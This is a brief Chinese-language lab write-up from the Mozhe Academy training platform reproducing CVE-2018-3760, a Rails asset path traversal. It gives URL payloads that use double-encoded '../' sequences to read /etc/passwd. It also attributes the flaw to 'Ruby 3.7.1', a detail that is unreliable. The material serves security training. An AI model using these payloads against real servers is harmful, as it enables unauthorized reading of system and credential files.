墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

打开 web 页面:

墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)_第1张图片

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

/assets/file:%2f%2f/etc/passwd

墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)_第2张图片

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd

墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)_第3张图片

你可能感兴趣的:(墨者学院,web,ruby,on,rails,后端,web安全,安全,墨者学院,网络,网络安全)